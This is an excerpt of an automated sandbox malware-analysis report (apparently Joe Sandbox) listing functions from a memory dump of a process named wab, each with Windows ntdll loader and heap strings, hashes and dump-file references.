                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              • Opcode ID: c9e27396933e432a45030527cd93fe308a383ee3f77e06e954296e9b874de0a6
                                                              • Instruction ID: 711f2294693f7604e6e71357b0879a8266b4788bcbb561bc4f9bcd49222e930b
                                                              • Opcode Fuzzy Hash: c9e27396933e432a45030527cd93fe308a383ee3f77e06e954296e9b874de0a6
                                                              • Instruction Fuzzy Hash: B6C18630A00A169FDB16CFF4DC91B7E77B4AF45300F1081ABE905AB291D7749E64D791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 104632080e88b57b7f366f60906cc684b491b11b1aac734aa78f94f5c7338f45
                                                              • Instruction ID: 993d9e2a19c076c176533af8a5dbaad2415cefba7d43772ec0c53856bf21fd1b
                                                              • Opcode Fuzzy Hash: 104632080e88b57b7f366f60906cc684b491b11b1aac734aa78f94f5c7338f45
                                                              • Instruction Fuzzy Hash: 7E916A35E05725DBDB29CFD0CC89B5A77A9BB00B18F10011BF9046B2D5D7785D60DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202BF525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                              • API String ID: 0-1745908468
                                                              • Opcode ID: ae408eabb6ba5a9c16b40828d70ae06e01fccb5dca6bb6f3524de67586e037a4
                                                              • Instruction ID: 06f652bff162a57fed72f55b9343c9a3d138d2fb569c4969eba723aaeaef1c0d
                                                              • Opcode Fuzzy Hash: ae408eabb6ba5a9c16b40828d70ae06e01fccb5dca6bb6f3524de67586e037a4
                                                              • Instruction Fuzzy Hash: 3491CB31900646DFCB12CFE8C881B9DBBF6BF59354F14805BE954AB662CB35AA60DF10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 20269A11, 20269A3A
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 20269A01
                                                              • LdrpInitShimEngine, xrefs: 202699F4, 20269A07, 20269A30
                                                              • apphelp.dll, xrefs: 20206496
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 202699ED
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 20269A2A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 8c02b7621b319092caa68e2f66a115fe4abd25deb9f745a7159a74c2b1525e04
                                                              • Instruction ID: 0ea70bf06dc619f67ed42cc61bf61d3d7274f73a09bbb5a1bdd242b7b52cb3ad
                                                              • Opcode Fuzzy Hash: 8c02b7621b319092caa68e2f66a115fe4abd25deb9f745a7159a74c2b1525e04
                                                              • Instruction Fuzzy Hash: 77510E712187049FE329CFA0CC85F5B77E9FB94644F10091BF585A7160DA30EE54DB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 202802BD
                                                              • RTL: Re-Waiting, xrefs: 2028031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 202802E7
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 0c5c4e579e3e45450c8950ecf2b7e2f77a069e16ce6719de71627ef88767e546
                                                              • Instruction ID: d9594fa710391ebcaf642878d933df68b113be3d4e6d85a6cd4addb81f1843a0
                                                              • Opcode Fuzzy Hash: 0c5c4e579e3e45450c8950ecf2b7e2f77a069e16ce6719de71627ef88767e546
                                                              • Instruction Fuzzy Hash: 94E1EF746087429FD354CFA8DC85B1AB7E0BF84324F200A6EF5A48B2E1D774E964CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202C11A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: This is located in the %s field of the heap header.$ - `$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                              • API String ID: 0-2877493756
                                                              • Opcode ID: f342085dc5e7912ef6a30f2bad038c4ed3117cb532d821650efcc2cbfa5126d6
                                                              • Instruction ID: a137be59adc88452eb09785a1f4bcdab71e5db167c5b02c69efaa403f569596c
                                                              • Opcode Fuzzy Hash: f342085dc5e7912ef6a30f2bad038c4ed3117cb532d821650efcc2cbfa5126d6
                                                              • Instruction Fuzzy Hash: E2312035100531EFD305CBD8CC82F5A77E9FF26264F220257FA01CB290E634AD60CA52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202270C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: fbb291e05fbb49a991611c7792d8bb0449021367a927420e6d0f07be78a50f27
                                                              • Instruction ID: 5f9aee1b8168aa2b52701c279c1f63d9d3d0e4bd4fede83d6760262e0c69c689
                                                              • Opcode Fuzzy Hash: fbb291e05fbb49a991611c7792d8bb0449021367a927420e6d0f07be78a50f27
                                                              • Instruction Fuzzy Hash: 2D13A070A05A56CFDB14CFE8D880BA9BBF1BF48304F14819AD949AB781D734AD65CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20221070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-3570731704
                                                              • Opcode ID: ad4330bf078f16d38a395eccef561d37d672764766038e5092481a1fdff4368e
                                                              • Instruction ID: dcec77a0b3ac2fa9721fa3fa0002bbfd4e43a39e86e90a2116ac242879aec553
                                                              • Opcode Fuzzy Hash: ad4330bf078f16d38a395eccef561d37d672764766038e5092481a1fdff4368e
                                                              • Instruction Fuzzy Hash: D8928871A01629CFEB24CF98CC81F99B7B6BF54300F1181EAE949A7291D774AE90CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2021A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: c2651240d211c25af8ed87d151b6eab8ce623c7c6b8fb2e9473ca9c0bda4d70a
                                                              • Instruction ID: 2913c267d46f0bb7855915b52c1928aa736fb66488b1b0eb25838ac0794b55ac
                                                              • Opcode Fuzzy Hash: c2651240d211c25af8ed87d151b6eab8ce623c7c6b8fb2e9473ca9c0bda4d70a
                                                              • Instruction Fuzzy Hash: F8C18870518386CFC711CF98C940B5AB7E4BF84704F10896FF9958B262E778DA99CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20248402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 20248421
                                                              • @, xrefs: 20248591
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2024855E
                                                              • LdrpInitializeProcess, xrefs: 20248422
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: f41e2cf49a846753f7d5b5303307018e0487342354187ce89c1cee19cd468e31
                                                              • Instruction ID: af202de4854ce5b5e214a679cc09b5180a862bfbe29dc88c6efece8e64092605
                                                              • Opcode Fuzzy Hash: f41e2cf49a846753f7d5b5303307018e0487342354187ce89c1cee19cd468e31
                                                              • Instruction Fuzzy Hash: 17918E71918395AFD715DFA1CC81F6FBBECBB84644F40092BFA8492551E234DA288B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 20270FE5
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 20271028
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2027106B
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 202710AE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: f76acdaab315a3fe251773009549dbec60b518feb5d36d7905a1072c1a449b2d
                                                              • Instruction ID: 07586615efd483a73f1b420c3f61de64ed5347ea4dc0c38f8399ee5c71211d29
                                                              • Opcode Fuzzy Hash: f76acdaab315a3fe251773009549dbec60b518feb5d36d7905a1072c1a449b2d
                                                              • Instruction Fuzzy Hash: 4A71ADB1904305ABC720CF94CC89B8BBFA9AF54754F50446AF9488A197D734E5A8CFD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                              • API String ID: 0-2586055223
                                                              • Opcode ID: 984c3b884495a0818bb476237ae77b9570152e7bf04e20eb09be24163ceb82bd
                                                              • Instruction ID: 47ac7ae43d6d88be881449b0de80480b0dc71095781eeeee8ad383622dbca8bd
                                                              • Opcode Fuzzy Hash: 984c3b884495a0818bb476237ae77b9570152e7bf04e20eb09be24163ceb82bd
                                                              • Instruction Fuzzy Hash: C46120322047819FD711CFA4CC45F5B77E9FF90714F14046AFA648B692DA34E9A4CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 2027A9A2
                                                              • apphelp.dll, xrefs: 20232462
                                                              • LdrpDynamicShimModule, xrefs: 2027A998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2027A992
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: e87afe5ce2b0df97b286619e2afa0bf5c72b2869fdf028f96fd6ad3ad6ba44ed
                                                              • Instruction ID: c542886c6aee0dd469254af20d02aa2b32b94e9ba9f841fde3eaf2629afcdaa9
                                                              • Opcode Fuzzy Hash: e87afe5ce2b0df97b286619e2afa0bf5c72b2869fdf028f96fd6ad3ad6ba44ed
                                                              • Instruction Fuzzy Hash: 07312671605602EBD7118FD88C81E5AB7BEFBC4714F22805BFA0067265C778ADA1DB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20209148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                              • API String ID: 0-1391187441
                                                              • Opcode ID: d36e0d4504e9802fd556bb5a8f49566e62a8b6b8676baa93563145914054a1b8
                                                              • Instruction ID: 03f929d56c81330ce077a2a0f5dbdaa4e8fbb7df10e34822f327179f6fc4ad0e
                                                              • Opcode Fuzzy Hash: d36e0d4504e9802fd556bb5a8f49566e62a8b6b8676baa93563145914054a1b8
                                                              • Instruction Fuzzy Hash: 6231823260021AEFC702CBD5CC85F9AB7BAEF65664F154056F919A7291D730ED90CE60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20251270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$BuildLabEx$E$ $\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 0-1162794518
                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction ID: c01534216f8464e1ae3a55081d9409f1fd2b8dbfdb2e4a9236deebfbac21624a
                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction Fuzzy Hash: 1C31BE72900528BFDB158FD4CC55F9EBFBDEB94710F104063FA14A72A0D734AA298B64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202B94E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $0
                                                              • API String ID: 0-3352262554
                                                              • Opcode ID: 0a2e0f694e900a733a4415c2f00c332d0e1933db976fb0ecdab3f9f08d11236c
                                                              • Instruction ID: 83a93d3dd7c730b31fdfbae51ff496bbdd5b2f6b5cb79e1d3e8685a9358a7eed
                                                              • Opcode Fuzzy Hash: 0a2e0f694e900a733a4415c2f00c332d0e1933db976fb0ecdab3f9f08d11236c
                                                              • Instruction Fuzzy Hash: E43202B16083828FD350CFA8C884B5BFBE5BB88384F10492EF59997251D779E958CF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20211460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 20211728
                                                              • HEAP[%wZ]: , xrefs: 20211712
                                                              • HEAP: , xrefs: 20211596
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 030b5057242396ff012bd9ee9b9a55aca76bcd42654b453360c0d46aeccb4f33
                                                              • Instruction ID: ab7f94f2fd70a3d96bb546b23fe3055753f860a660b3d05398bb7cebb7096ba9
                                                              • Opcode Fuzzy Hash: 030b5057242396ff012bd9ee9b9a55aca76bcd42654b453360c0d46aeccb4f33
                                                              • Instruction Fuzzy Hash: AFE10530A146569FCB15CFA8C841B7AFBF6AF44300F24845FE596CB286D734E9A1CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: 355fe7eaf52f169b6ad605b3322e8d771fc20db115dc078fb1f97156f9f7fafe
                                                              • Instruction ID: 817e07f0b3662e919c6a043ab1a21f0522a7d6ad758492e558ae965ae6e7c392
                                                              • Opcode Fuzzy Hash: 355fe7eaf52f169b6ad605b3322e8d771fc20db115dc078fb1f97156f9f7fafe
                                                              • Instruction Fuzzy Hash: D0A17D719116299BDB21DFA4CC88BEAB7B8EF44714F2041EAE908A7250D735AFD4CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2021B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                              • API String ID: 0-373624363
                                                              • Opcode ID: b68106547846aa7682cc914dfa9c9165927e8868698ebef5067f052adf743084
                                                              • Instruction ID: 5c20ce164d3e850ac1f75c3b5cd7a6ed3bdf80baf3578be483a0aead63f9f998
                                                              • Opcode Fuzzy Hash: b68106547846aa7682cc914dfa9c9165927e8868698ebef5067f052adf743084
                                                              • Instruction Fuzzy Hash: F991AE7190524ACBDB12CF98CD90B9EB7F5BF15354F208197E910AB292D7789EA0CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
